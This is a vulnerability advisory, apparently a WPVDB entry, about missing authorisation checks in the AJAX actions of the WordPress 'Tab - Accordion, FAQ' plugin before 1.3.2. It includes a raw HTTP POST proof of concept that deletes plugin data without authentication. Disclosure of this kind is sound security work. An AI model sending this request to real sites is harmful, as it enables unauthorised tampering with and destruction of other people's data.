WordPress Plugin Vulnerabilities
Tab - Accordion, FAQ < 1.3.2 - Unauthenticated AJAX Calls
Description
All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs.
v1.3.0 added CSRF checks, however authorisation was still missing and has been added in 1.3.2
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 42 Connection: close action=RW_Tabs_Man_Delete_Opt&Deleted_ID=4
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Brandon Roldan
Submitter
Brandon Roldan
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-06 (about 2 years ago)
Added
2021-12-06 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)